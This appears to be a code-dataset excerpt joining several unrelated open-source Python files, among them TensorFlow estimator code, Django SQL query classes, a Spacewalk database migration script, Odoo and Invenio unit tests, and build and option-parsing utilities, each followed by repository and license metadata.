raise ValueError('eval_metric_ops must be a dict.')
# Validate hooks
if training_chief_hooks is None:
training_chief_hooks = []
if training_hooks is None:
training_hooks = []
for hook in training_hooks + training_chief_hooks:
if not isinstance(hook, session_run_hook.SessionRunHook):
raise TypeError('All hooks returned from model_fn must be '
'SessionRunHook instances, got instance of %s: %s' %
(type(hook), hook))
return super(ModelFnOps, cls).__new__(
cls,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metric_ops=eval_metric_ops,
output_alternatives=output_alternatives,
training_chief_hooks=training_chief_hooks,
training_hooks=training_hooks,
scaffold=scaffold,
mode=mode)
def estimator_spec(self, default_serving_output_alternative_key=None):
"""Creates an equivalent `EstimatorSpec`.
Args:
default_serving_output_alternative_key: Required for multiple heads. If
you have multiple entries in `output_alternatives` dict (comparable to
multiple heads), `EstimatorSpec` requires a default head that will be
used if a Servo request does not explicitly mention which head to infer
on. Pass the key of the output alternative here that you want to
designate as default. A separate ExportOutpout for this default head
wil be added to the export_outputs dict with the special key
signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY, unless there is
already an enry in output_alternatives with this special key.
Returns:
Instance of `EstimatorSpec` that is equivalent to this `ModelFnOps`
Raises:
ValueError: If problem type is unknown.
"""
def _scores(output_tensors):
scores = output_tensors.get(prediction_key.PredictionKey.SCORES)
if scores is None:
scores = output_tensors.get(prediction_key.PredictionKey.PROBABILITIES)
return scores
def _classes(output_tensors): # pylint: disable=missing-docstring
classes = output_tensors.get(prediction_key.PredictionKey.CLASSES)
if classes is None:
logging.warning(
'classes is None, Servo inference will not have class ids.')
return None
elif classes.dtype != dtypes.string:
# Servo classification can only serve string classes
logging.warning(
'classes is not string, Servo inference will not have class ids.')
return None
return classes
def _export_output(problem_type, predictions): # pylint: disable=missing-docstring
if problem_type == constants.ProblemType.LINEAR_REGRESSION:
return core_export_lib.RegressionOutput(_scores(predictions))
if (problem_type == constants.ProblemType.CLASSIFICATION or
problem_type == constants.ProblemType.LOGISTIC_REGRESSION):
return core_export_lib.ClassificationOutput(
scores=_scores(predictions), classes=_classes(predictions))
if problem_type == constants.ProblemType.UNSPECIFIED:
return core_export_lib.PredictOutput(predictions)
raise ValueError('Unknown problem_type=%s' % problem_type)
# Converts output_alternatives
export_outputs_dict = None
if self.output_alternatives:
output_alternatives = self.output_alternatives
# Adds default output_alternative if needed.
if (len(output_alternatives) > 1 and
signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY not in
output_alternatives):
output_alternatives = output_alternatives.copy()
output_alternatives[
signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY] = (
output_alternatives[default_serving_output_alternative_key])
export_outputs_dict = {key: _export_output(*val) for key, val in
output_alternatives.items()}
def _get_eval_metric_ops():
"""Returns self.eval_metric_ops without loss metric."""
result = {}
for key, value in six.iteritems(self.eval_metric_ops):
if key != metric_key.MetricKey.LOSS:
result[key] = value
return result
return core_model_fn_lib.EstimatorSpec(
mode=self.mode,
predictions=self.predictions,
loss=self.loss,
train_op=self.train_op,
eval_metric_ops=_get_eval_metric_ops(),
export_outputs=export_outputs_dict,
training_chief_hooks=self.training_chief_hooks,
training_hooks=self.training_hooks,
scaffold=self.scaffold)
| apache-2.0 |
lastcoin/lastcoin | share/qt/extract_strings_qt.py | 2945 | 1844 | #!/usr/bin/python
'''
Extract _("...") strings for translation and convert to Qt4 stringdefs so that
they can be picked up by Qt linguist.
'''
from subprocess import Popen, PIPE
import glob
import operator
OUT_CPP="src/qt/bitcoinstrings.cpp"
EMPTY=['""']
def parse_po(text):
"""
Parse 'po' format produced by xgettext.
Return a list of (msgid,msgstr) tuples.
"""
messages = []
msgid = []
msgstr = []
in_msgid = False
in_msgstr = False
for line in text.split('\n'):
line = line.rstrip('\r')
if line.startswith('msgid '):
if in_msgstr:
messages.append((msgid, msgstr))
in_msgstr = False
# message start
in_msgid = True
msgid = [line[6:]]
elif line.startswith('msgstr '):
in_msgid = False
in_msgstr = True
msgstr = [line[7:]]
elif line.startswith('"'):
if in_msgid:
msgid.append(line)
if in_msgstr:
msgstr.append(line)
if in_msgstr:
messages.append((msgid, msgstr))
return messages
files = glob.glob('src/*.cpp') + glob.glob('src/*.h')
# xgettext -n --keyword=_ $FILES
child = Popen(['xgettext','--output=-','-n','--keyword=_'] + files, stdout=PIPE)
(out, err) = child.communicate()
messages = parse_po(out)
f = open(OUT_CPP, 'w')
f.write("""#include <QtGlobal>
// Automatically generated by extract_strings.py
#ifdef __GNUC__
#define UNUSED __attribute__((unused))
#else
#define UNUSED
#endif
""")
f.write('static const char UNUSED *bitcoin_strings[] = {\n')
messages.sort(key=operator.itemgetter(0))
for (msgid, msgstr) in messages:
if msgid != EMPTY:
f.write('QT_TRANSLATE_NOOP("bitcoin-core", %s),\n' % ('\n'.join(msgid)))
f.write('};')
f.close()
| mit |
doganaltunbay/odoo | openerp/addons/base/tests/test_ir_attachment.py | 433 | 3536 | import hashlib
import os
import openerp
import openerp.tests.common
HASH_SPLIT = 2 # FIXME: testing implementations detail is not a good idea
class test_ir_attachment(openerp.tests.common.TransactionCase):
def setUp(self):
super(test_ir_attachment, self).setUp()
registry, cr, uid = self.registry, self.cr, self.uid
self.ira = registry('ir.attachment')
self.filestore = self.ira._filestore(cr, uid)
# Blob1
self.blob1 = 'blob1'
self.blob1_b64 = self.blob1.encode('base64')
blob1_hash = hashlib.sha1(self.blob1).hexdigest()
self.blob1_fname = blob1_hash[:HASH_SPLIT] + '/' + blob1_hash
# Blob2
blob2 = 'blob2'
self.blob2_b64 = blob2.encode('base64')
def test_01_store_in_db(self):
registry, cr, uid = self.registry, self.cr, self.uid
# force storing in database
registry('ir.config_parameter').set_param(cr, uid, 'ir_attachment.location', 'db')
# 'ir_attachment.location' is undefined test database storage
a1 = self.ira.create(cr, uid, {'name': 'a1', 'datas': self.blob1_b64})
a1_read = self.ira.read(cr, uid, [a1], ['datas'])
self.assertEqual(a1_read[0]['datas'], self.blob1_b64)
a1_db_datas = self.ira.browse(cr, uid, a1).db_datas
self.assertEqual(a1_db_datas, self.blob1_b64)
def test_02_store_on_disk(self):
registry, cr, uid = self.registry, self.cr, self.uid
a2 = self.ira.create(cr, uid, {'name': 'a2', 'datas': self.blob1_b64})
a2_store_fname = self.ira.browse(cr, uid, a2).store_fname
self.assertEqual(a2_store_fname, self.blob1_fname)
self.assertTrue(os.path.isfile(os.path.join(self.filestore, a2_store_fname)))
def test_03_no_duplication(self):
registry, cr, uid = self.registry, self.cr, self.uid
a2 = self.ira.create(cr, uid, {'name': 'a2', 'datas': self.blob1_b64})
a2_store_fname = self.ira.browse(cr, uid, a2).store_fname
a3 = self.ira.create(cr, uid, {'name': 'a3', 'datas': self.blob1_b64})
a3_store_fname = self.ira.browse(cr, uid, a3).store_fname
self.assertEqual(a3_store_fname, a2_store_fname)
def test_04_keep_file(self):
registry, cr, uid = self.registry, self.cr, self.uid
a2 = self.ira.create(cr, uid, {'name': 'a2', 'datas': self.blob1_b64})
a3 = self.ira.create(cr, uid, {'name': 'a3', 'datas': self.blob1_b64})
a2_store_fname = self.ira.browse(cr, uid, a2).store_fname
a2_fn = os.path.join(self.filestore, a2_store_fname)
self.ira.unlink(cr, uid, [a3])
self.assertTrue(os.path.isfile(a2_fn))
# delete a2 it is unlinked
self.ira.unlink(cr, uid, [a2])
self.assertFalse(os.path.isfile(a2_fn))
def test_05_change_data_change_file(self):
registry, cr, uid = self.registry, self.cr, self.uid
a2 = self.ira.create(cr, uid, {'name': 'a2', 'datas': self.blob1_b64})
a2_store_fname = self.ira.browse(cr, uid, a2).store_fname
a2_fn = os.path.join(self.filestore, a2_store_fname)
self.assertTrue(os.path.isfile(a2_fn))
self.ira.write(cr, uid, [a2], {'datas': self.blob2_b64})
self.assertFalse(os.path.isfile(a2_fn))
new_a2_store_fname = self.ira.browse(cr, uid, a2).store_fname
self.assertNotEqual(a2_store_fname, new_a2_store_fname)
new_a2_fn = os.path.join(self.filestore, new_a2_store_fname)
self.assertTrue(os.path.isfile(new_a2_fn))
| agpl-3.0 |
sam-tsai/django | django/db/models/sql/subqueries.py | 210 | 7963 | """
Query subclasses which provide extra functionality beyond simple data retrieval.
"""
from django.core.exceptions import FieldError
from django.db import connections
from django.db.models.query_utils import Q
from django.db.models.sql.constants import (
CURSOR, GET_ITERATOR_CHUNK_SIZE, NO_RESULTS,
)
from django.db.models.sql.query import Query
from django.utils import six
__all__ = ['DeleteQuery', 'UpdateQuery', 'InsertQuery', 'AggregateQuery']
class DeleteQuery(Query):
"""
Delete queries are done through this class, since they are more constrained
than general queries.
"""
compiler = 'SQLDeleteCompiler'
def do_query(self, table, where, using):
self.tables = [table]
self.where = where
cursor = self.get_compiler(using).execute_sql(CURSOR)
return cursor.rowcount if cursor else 0
def delete_batch(self, pk_list, using, field=None):
"""
Set up and execute delete queries for all the objects in pk_list.
More than one physical query may be executed if there are a
lot of values in pk_list.
"""
# number of objects deleted
num_deleted = 0
if not field:
field = self.get_meta().pk
for offset in range(0, len(pk_list), GET_ITERATOR_CHUNK_SIZE):
self.where = self.where_class()
self.add_q(Q(
**{field.attname + '__in': pk_list[offset:offset + GET_ITERATOR_CHUNK_SIZE]}))
num_deleted += self.do_query(self.get_meta().db_table, self.where, using=using)
return num_deleted
def delete_qs(self, query, using):
"""
Delete the queryset in one SQL query (if possible). For simple queries
this is done by copying the query.query.where to self.query, for
complex queries by using subquery.
"""
innerq = query.query
# Make sure the inner query has at least one table in use.
innerq.get_initial_alias()
# The same for our new query.
self.get_initial_alias()
innerq_used_tables = [t for t in innerq.tables
if innerq.alias_refcount[t]]
if not innerq_used_tables or innerq_used_tables == self.tables:
# There is only the base table in use in the query.
self.where = innerq.where
else:
pk = query.model._meta.pk
if not connections[using].features.update_can_self_select:
# We can't do the delete using subquery.
values = list(query.values_list('pk', flat=True))
if not values:
return
return self.delete_batch(values, using)
else:
innerq.clear_select_clause()
innerq.select = [
pk.get_col(self.get_initial_alias())
]
values = innerq
self.where = self.where_class()
self.add_q(Q(pk__in=values))
cursor = self.get_compiler(using).execute_sql(CURSOR)
return cursor.rowcount if cursor else 0
class UpdateQuery(Query):
"""
Represents an "update" SQL query.
"""
compiler = 'SQLUpdateCompiler'
def __init__(self, *args, **kwargs):
super(UpdateQuery, self).__init__(*args, **kwargs)
self._setup_query()
def _setup_query(self):
"""
Runs on initialization and after cloning. Any attributes that would
normally be set in __init__ should go in here, instead, so that they
are also set up after a clone() call.
"""
self.values = []
self.related_ids = None
if not hasattr(self, 'related_updates'):
self.related_updates = {}
def clone(self, klass=None, **kwargs):
return super(UpdateQuery, self).clone(klass,
related_updates=self.related_updates.copy(), **kwargs)
def update_batch(self, pk_list, values, using):
self.add_update_values(values)
for offset in range(0, len(pk_list), GET_ITERATOR_CHUNK_SIZE):
self.where = self.where_class()
self.add_q(Q(pk__in=pk_list[offset: offset + GET_ITERATOR_CHUNK_SIZE]))
self.get_compiler(using).execute_sql(NO_RESULTS)
def add_update_values(self, values):
"""
Convert a dictionary of field name to value mappings into an update
query. This is the entry point for the public update() method on
querysets.
"""
values_seq = []
for name, val in six.iteritems(values):
field = self.get_meta().get_field(name)
direct = not (field.auto_created and not field.concrete) or not field.concrete
model = field.model._meta.concrete_model
if not direct or (field.is_relation and field.many_to_many):
raise FieldError(
'Cannot update model field %r (only non-relations and '
'foreign keys permitted).' % field
)
if model is not self.get_meta().model:
self.add_related_update(model, field, val)
continue
values_seq.append((field, model, val))
return self.add_update_fields(values_seq)
def add_update_fields(self, values_seq):
"""
Turn a sequence of (field, model, value) triples into an update query.
Used by add_update_values() as well as the "fast" update path when
saving models.
"""
self.values.extend(values_seq)
def add_related_update(self, model, field, value):
"""
Adds (name, value) to an update query for an ancestor model.
Updates are coalesced so that we only run one update query per ancestor.
"""
self.related_updates.setdefault(model, []).append((field, None, value))
def get_related_updates(self):
"""
Returns a list of query objects: one for each update required to an
ancestor model. Each query will have the same filtering conditions as
the current query but will only update a single table.
"""
if not self.related_updates:
return []
result = []
for model, values in six.iteritems(self.related_updates):
query = UpdateQuery(model)
query.values = values
if self.related_ids is not None:
query.add_filter(('pk__in', self.related_ids))
result.append(query)
return result
class InsertQuery(Query):
compiler = 'SQLInsertCompiler'
def __init__(self, *args, **kwargs):
super(InsertQuery, self).__init__(*args, **kwargs)
self.fields = []
self.objs = []
def clone(self, klass=None, **kwargs):
extras = {
'fields': self.fields[:],
'objs': self.objs[:],
'raw': self.raw,
}
extras.update(kwargs)
return super(InsertQuery, self).clone(klass, **extras)
def insert_values(self, fields, objs, raw=False):
"""
Set up the insert query from the 'insert_values' dictionary. The
dictionary gives the model field names and their target values.
If 'raw_values' is True, the values in the 'insert_values' dictionary
are inserted directly into the query, rather than passed as SQL
parameters. This provides a way to insert NULL and DEFAULT keywords
into the query, for example.
"""
self.fields = fields
self.objs = objs
self.raw = raw
class AggregateQuery(Query):
"""
An AggregateQuery takes another query as a parameter to the FROM
clause and only selects the elements in the provided list.
"""
compiler = 'SQLAggregateCompiler'
def add_subquery(self, query, using):
self.subquery, self.sub_params = query.get_compiler(using).as_sql(
with_col_aliases=True,
subquery=True,
)
| bsd-3-clause |
renner/spacewalk | scripts/update_symlinks.py | 8 | 5799 | #!/usr/bin/python
#
# Copyright (c) 2008--2013 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#
#
# Test for blob updates
#
"""
This script is meant to be used by spacewalk users upgrading from 1.0 to 1.1.
The schema storing the symlinks target path was updated between spacewalk 1.0 to 1.1
from a blob in rhnConfigContent to symlink_target_filename_id in rhnConfigInfo.
This script extracts symlink paths that were previously stored as blobs in rhnConfigContent
and then creates an entry in rhnConfigFileName with that path and sets the
rhnConfigInfo.symlink_target_filename_id.
It acquires the database information from rhn.conf
"""
import sys
sys.path.insert(0, "/usr/share/rhn")
from common.rhnConfig import CFG, initCFG
from server import rhnSQL
from os.path import isabs
def setup_db():
initCFG('server.satellite')
db_backend = CFG.DB_BACKEND
db_host = CFG.DB_HOST
db_port = CFG.DB_PORT
db_user = CFG.DB_user
db_password = CFG.DB_PASSWORD
database = CFG.DB_NAME
rhnSQL.initDB(backend=db_backend, host=db_host, port=db_port,
username=db_user, password=db_password, database=database)
def main():
setup_db()
print "================="
print "Updating Symbolic Links"
q = """select cr.id as rev_id,
ccon.id as content_id,
ccon.contents,
cr.CONFIG_INFO_ID as info_id,
cf.id as file_id,
cc.org_id,
wc.name as org_name,
ci.SELINUX_CTX as selinux,
cfn.path as path,
ci.SYMLINK_TARGET_FILENAME_ID as info_target,
nvl( (select path from rhnCOnfigFileName where id = ci.SYMLINK_TARGET_FILENAME_ID), 'None') as name_target
from rhnConfigContent ccon
inner join rhnConfigRevision cr on cr.config_content_id = ccon.id
inner join rhnConfigFile cf on cr.CONFIG_FILE_ID = cf.id
inner join rhnConfigFileName cfn on cfn.id = cf.config_file_name_id
inner join rhnConfigInfo ci on ci.id = cr.CONFIG_INFO_ID
inner join rhnConfigChannel cc on cf.CONFIG_CHANNEL_ID = cc.id
inner join web_customer wc on cc.org_id = wc.id
where
cr.CONFIG_FILE_TYPE_ID in (select id from rhnConfigFileType where label='symlink')"""
h = rhnSQL.prepare(q)
h.execute()
results = h.fetchall_dict()
if not results:
print "Update completed."
print "================="
return
contents = []
for row in results:
contents.append( dict(revision_id = row["rev_id"],
file_id = row ["file_id"],
info_id = row ["info_id"],
content_id = row ["content_id"],
path = row['path'],
info_target = row['info_target'],
name_target = row['name_target'],
selinux = row['selinux'],
org_id = row['org_id'],
org_name = row['org_name'],
symlink_target = rhnSQL.read_lob(row["contents"])))
update_query = """update rhnConfigRevision set config_info_id =
lookup_config_info(null, null, null, :selinux, lookup_config_filename(:symlink_target)) where id = :revision_id"""
null_symlink_update_query = """update rhnConfigRevision set config_info_id =
lookup_config_info(null, null, null, :selinux, null) where id = :revision_id"""
update_cr = """ update rhnConfigRevision set config_content_id = null where id = :revision_id"""
delete_content = """ delete from rhnConfigContent where id = :content_id"""
format = """
Path: [%(path)s]
Symbolic link:[%(symlink_target)s]
Update URL: https://<FQDN>/rhn/configuration/file/FileDetails.do?cfid=%(file_id)d&crid=%(revision_id)d
Organization Id : [%(org_id)d]
Organization Name : [%(org_name)s]
"""
bad_items = list()
for item in contents:
if item['symlink_target'] is None:
bad_items.append(item)
rhnSQL.prepare(null_symlink_update_query).execute(**item)
else:
if not isabs(item['symlink_target']) or len(item['symlink_target']) >= 1024:
bad_items.append(item)
item['symlink_target'] = item['symlink_target'][:1024]
rhnSQL.prepare(update_query).execute(**item)
rhnSQL.prepare(update_cr).execute(**item)
rhnSQL.prepare(delete_content).execute(**item)
print format % item
rhnSQL.commit()
rhnSQL.closeDB()
print "%d rows updated." % len(contents)
print "Update completed"
print "================="
msg = """
The following symbolic link paths are either null or not absolute or above 1024 characters in length.
While entries have been added in the DB, the values have to be updated for them in the Web UI.
Please go to the provided url, logging in as a user with config admin/org admin role in the specified organization
and update the target path value accordingly.
"""
if bad_items:
print msg
for item in bad_items:
print format % item
if __name__ == '__main__':
sys.exit(main() or 0)
| gpl-2.0 |
teamCarel/EyeTracker | src/shared_modules/calibration_routines/calibration_plugin_base.py | 2 | 2391 | '''
(*)~---------------------------------------------------------------------------
Pupil - eye tracking platform
Copyright (C) 2012-2017 Pupil Labs
Distributed under the terms of the GNU
Lesser General Public License (LGPL v3.0).
See COPYING and COPYING.LESSER for license details.
---------------------------------------------------------------------------~(*)
'''
from plugin import Plugin
import logging
logger = logging.getLogger(__name__)
class Calibration_Plugin(Plugin):
'''base class for all calibration routines'''
uniqueness = 'by_base_class'
def __init__(self,g_pool):
super().__init__(g_pool)
self.g_pool.active_calibration_plugin = self
self.pupil_confidence_threshold = 0.6
self.active = False
def on_notify(self,notification):
'''Handles calibration notifications
Reacts to notifications:
``calibration.should_start``: Starts the calibration procedure
``calibration.should_stop``: Stops the calibration procedure
Emits notifications:
``calibration.started``: Calibration procedure started
``calibration.stopped``: Calibration procedure stopped
``calibration.failed``: Calibration failed
``calibration.successful``: Calibration succeeded
Args:
notification (dictionary): Notification dictionary
'''
if notification['subject'].startswith('calibration.should_start'):
if self.active:
logger.warning('Calibration already running.')
else:
self.start()
self.notify_all({'subject':'calibration.started'})
elif notification['subject'].startswith('calibration.should_stop'):
if self.active:
self.notify_all({'subject':'calibration.stopped'})
self.stop()
else:
logger.warning('Calibration already stopped.')
def toggle(self,_=None):
if self.active:
self.notify_all({'subject':'calibration.should_stop'})
else:
self.notify_all({'subject':'calibration.should_start'})
def start(self):
raise NotImplementedError()
self.notify_all({'subject':'calibration.started'})
def stop(self):
raise NotImplementedError()
self.notify_all({'subject':'calibration.stopped'})
| lgpl-3.0 |
balister/gnuradio | gnuradio-runtime/python/gnuradio/eng_option.py | 61 | 2090 | #
# Copyright 2004 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
'''Add support for engineering notation to optparse.OptionParser'''
from copy import copy
from optparse import Option, OptionValueError
import eng_notation
def check_eng_float (option, opt, value):
try:
return eng_notation.str_to_num(value)
except:
raise OptionValueError (
"option %s: invalid engineering notation value: %r" % (opt, value))
def check_intx (option, opt, value):
try:
return int (value, 0)
except:
raise OptionValueError (
"option %s: invalid integer value: %r" % (opt, value))
def check_subdev (option, opt, value):
"""
Value has the form: (A|B)(:0|1)?
Returns:
a 2-tuple (0|1, 0|1)
"""
d = { 'A' : (0, 0), 'A:0' : (0, 0), 'A:1' : (0, 1), 'A:2' : (0, 2),
'B' : (1, 0), 'B:0' : (1, 0), 'B:1' : (1, 1), 'B:2' : (1, 2) }
try:
return d[value.upper()]
except:
raise OptionValueError(
"option %s: invalid subdev: '%r', must be one of %s" % (opt, value, ', '.join(sorted(d.keys()))))
class eng_option (Option):
TYPES = Option.TYPES + ("eng_float", "intx", "subdev")
TYPE_CHECKER = copy (Option.TYPE_CHECKER)
TYPE_CHECKER["eng_float"] = check_eng_float
TYPE_CHECKER["intx"] = check_intx
TYPE_CHECKER["subdev"] = check_subdev
| gpl-3.0 |
mkaluza/external_chromium_org | tools/cr/cr/actions/ninja.py | 23 | 2458 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""A module to add ninja support to cr."""
import os
import cr
_PHONY_SUFFIX = ': phony'
_LINK_SUFFIX = ': link'
class NinjaBuilder(cr.Builder):
"""An implementation of Builder that uses ninja to do the actual build."""
# Some basic configuration installed if we are enabled.
ENABLED = cr.Config.From(
NINJA_BINARY=os.path.join('{DEPOT_TOOLS}', 'ninja'),
NINJA_JOBS=200,
NINJA_PROCESSORS=12,
GOMA_DIR=os.path.join('{GOOGLE_CODE}', 'goma'),
)
# A placeholder for the system detected configuration
DETECTED = cr.Config('DETECTED')
def __init__(self):
super(NinjaBuilder, self).__init__()
self._targets = []
def Build(self, context, targets, arguments):
build_arguments = [target.build_target for target in targets]
build_arguments.extend(arguments)
cr.Host.Execute(
context,
'{NINJA_BINARY}',
'-C{CR_BUILD_DIR}',
'-j{NINJA_JOBS}',
'-l{NINJA_PROCESSORS}',
*build_arguments
)
def Clean(self, context, targets, arguments):
build_arguments = [target.build_target for target in targets]
build_arguments.extend(arguments)
cr.Host.Execute(
context,
'{NINJA_BINARY}',
'-C{CR_BUILD_DIR}',
'-tclean',
*build_arguments
)
def GetTargets(self, context):
"""Overridden from Builder.GetTargets."""
if not self._targets:
try:
context.Get('CR_BUILD_DIR', raise_errors=True)
except KeyError:
return self._targets
output = cr.Host.Capture(
context,
'{NINJA_BINARY}',
'-C{CR_BUILD_DIR}',
'-ttargets',
'all'
)
for line in output.split('\n'):
line = line.strip()
if line.endswith(_PHONY_SUFFIX):
target = line[:-len(_PHONY_SUFFIX)].strip()
self._targets.append(target)
elif line.endswith(_LINK_SUFFIX):
target = line[:-len(_LINK_SUFFIX)].strip()
self._targets.append(target)
return self._targets
@classmethod
def DetectNinja(cls):
# TODO(iancottrell): If we can't detect ninja, we should be disabled.
ninja_binaries = cr.Host.SearchPath('ninja')
if ninja_binaries:
cls.DETECTED.Set(NINJA_BINARY=ninja_binaries[0])
NinjaBuilder.DetectNinja()
| bsd-3-clause |
egabancho/invenio-groups | tests/test_models.py | 2 | 25711 | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Test groups data models."""
from __future__ import absolute_import, print_function, unicode_literals
from invenio.ext.sqlalchemy import db
from invenio.testsuite import InvenioTestCase, make_test_suite, run_test_suite
from sqlalchemy.exc import IntegrityError
from sqlalchemy.orm.exc import FlushError, NoResultFound
class BaseTestCase(InvenioTestCase):
"""Base test case."""
def setUp(self):
"""Clear tables."""
from invenio_groups.models import Group, Membership, GroupAdmin
from invenio_accounts.models import User
Membership.query.delete()
GroupAdmin.query.delete()
Group.query.delete()
User.query.filter(User.id != 1).delete()
db.session.commit()
def tearDown(self):
"""Expunge session."""
db.session.expunge_all()
class SubscriptionPolicyTestCase(BaseTestCase):
"""Test SubscriptionPolicy class."""
def test_validate(self):
"""Test policy validation."""
from invenio_groups.models import SubscriptionPolicy
self.assertTrue(SubscriptionPolicy.validate(SubscriptionPolicy.OPEN))
self.assertTrue(SubscriptionPolicy.validate(
SubscriptionPolicy.APPROVAL))
self.assertTrue(SubscriptionPolicy.validate(SubscriptionPolicy.CLOSED))
self.assertFalse(SubscriptionPolicy.validate("INVALID"))
def test_describe(self):
"""Test policy describe."""
from invenio_groups.models import SubscriptionPolicy
self.assertTrue(
SubscriptionPolicy.describe(SubscriptionPolicy.OPEN))
self.assertTrue(
SubscriptionPolicy.describe(SubscriptionPolicy.APPROVAL))
self.assertTrue(
SubscriptionPolicy.describe(SubscriptionPolicy.CLOSED))
self.assertIsNone(SubscriptionPolicy.describe("INVALID"))
class PrivacyPolicyTestCase(BaseTestCase):
"""Test PrivacyPolicy class."""
def test_validate(self):
"""Test policy validation."""
from invenio_groups.models import PrivacyPolicy
self.assertTrue(PrivacyPolicy.validate(PrivacyPolicy.PUBLIC))
self.assertTrue(PrivacyPolicy.validate(PrivacyPolicy.MEMBERS))
self.assertTrue(PrivacyPolicy.validate(PrivacyPolicy.ADMINS))
self.assertFalse(PrivacyPolicy.validate("INVALID"))
def test_describe(self):
"""Test policy describe."""
from invenio_groups.models import PrivacyPolicy
self.assertTrue(PrivacyPolicy.describe(PrivacyPolicy.PUBLIC))
self.assertTrue(PrivacyPolicy.describe(PrivacyPolicy.MEMBERS))
self.assertTrue(PrivacyPolicy.describe(PrivacyPolicy.ADMINS))
self.assertIsNone(PrivacyPolicy.describe("INVALID"))
class MembershipState(BaseTestCase):
"""Test MembershipState class."""
def test_validate(self):
"""Test policy validation."""
from invenio_groups.models import MembershipState
self.assertTrue(MembershipState.validate(
MembershipState.PENDING_ADMIN))
self.assertTrue(MembershipState.validate(
MembershipState.PENDING_USER))
self.assertTrue(MembershipState.validate(MembershipState.ACTIVE))
self.assertFalse(MembershipState.validate("INVALID"))
class GroupTestCase(BaseTestCase):
"""Test Group data model api."""
def test_creation(self):
"""Test creation of groups."""
from invenio_groups.models import Group, \
GroupAdmin, Membership, SubscriptionPolicy, PrivacyPolicy
g = Group.create(name="test")
self.assertEqual(g.name, 'test')
self.assertEqual(g.description, '')
self.assertEqual(g.subscription_policy, SubscriptionPolicy.CLOSED)
self.assertEqual(g.privacy_policy, PrivacyPolicy.ADMINS)
self.assertEqual(g.is_managed, False)
assert g.created
assert g.modified
self.assertEqual(GroupAdmin.query.count(), 0)
self.assertEqual(Membership.query.count(), 0)
g2 = Group.create(
name="admintest",
description="desc",
subscription_policy=SubscriptionPolicy.OPEN,
privacy_policy=PrivacyPolicy.PUBLIC,
is_managed=True,
admins=[g]
)
self.assertEqual(g2.name, 'admintest')
self.assertEqual(g2.description, 'desc')
self.assertEqual(g2.subscription_policy, SubscriptionPolicy.OPEN)
self.assertEqual(g2.privacy_policy, PrivacyPolicy.PUBLIC)
self.assertEqual(g2.is_managed, True)
assert g2.created
assert g2.modified
self.assertEqual(GroupAdmin.query.count(), 1)
admin = g2.admins[0]
self.assertEqual(admin.admin_type, 'Group')
self.assertEqual(admin.admin_id, g.id)
self.assertEqual(Membership.query.count(), 0)
def test_creation_existing_name(self):
"""Test what happens if group with identical name is created."""
from invenio_groups.models import Group
g = Group.create(name="test", )
self.assertRaises(
IntegrityError,
Group.create, name="test", admins=[g])
def test_creation_signals(self):
"""Test signals sent after creation."""
from invenio_groups.models import Group
from invenio_groups.signals import group_created
Group.called = False
def _receiver(sender=None, group=None):
Group.called = True
assert sender == Group
assert group.name == 'signaltest'
with group_created.connected_to(_receiver):
Group.create(name="signaltest")
assert Group.called
Group.called = False
with group_created.connected_to(_receiver):
self.assertRaises(IntegrityError, Group.create, name="signaltest")
assert not Group.called
def test_creation_invalid_data(self):
"""Test what happens if group with invalid data is created."""
from invenio_groups.models import Group
self.assertRaises(
AssertionError,
Group.create, name="")
self.assertRaises(
AssertionError,
Group.create, name="test", privacy_policy='invalid')
self.assertRaises(
AssertionError,
Group.create, name="test", subscription_policy='invalid')
self.assertEqual(Group.query.count(), 0)
def test_delete(self):
"""Test deletion of a group."""
from invenio_groups.models import Group, GroupAdmin, Membership
from invenio_accounts.models import User
g1 = Group.create(name="test1")
g2 = Group.create(name="test2", admins=[g1])
u = User(email="test@test.test", password="test")
db.session.add(u)
db.session.commit()
g2.add_member(u)
# Group is admin of another group, which will be left without admins
g1.delete()
self.assertEqual(Group.query.count(), 1)
self.assertEqual(GroupAdmin.query.count(), 0)
self.assertEqual(Membership.query.count(), 1)
g2.delete()
self.assertEqual(Group.query.count(), 0)
self.assertEqual(GroupAdmin.query.count(), 0)
self.assertEqual(Membership.query.count(), 0)
def test_update(self):
"""."""
from invenio_groups.models import Group, SubscriptionPolicy, \
PrivacyPolicy
g = Group.create(name="test")
m = g.modified
g.update(
name="test-change",
description="changed",
subscription_policy=SubscriptionPolicy.OPEN,
privacy_policy=PrivacyPolicy.MEMBERS,
is_managed=True,
)
self.assertEqual(g.name, 'test-change')
self.assertEqual(g.description, 'changed')
self.assertEqual(g.subscription_policy, SubscriptionPolicy.OPEN)
self.assertEqual(g.privacy_policy, PrivacyPolicy.MEMBERS)
self.assertTrue(g.is_managed)
self.assertIsNot(m, g.modified)
assert g.created
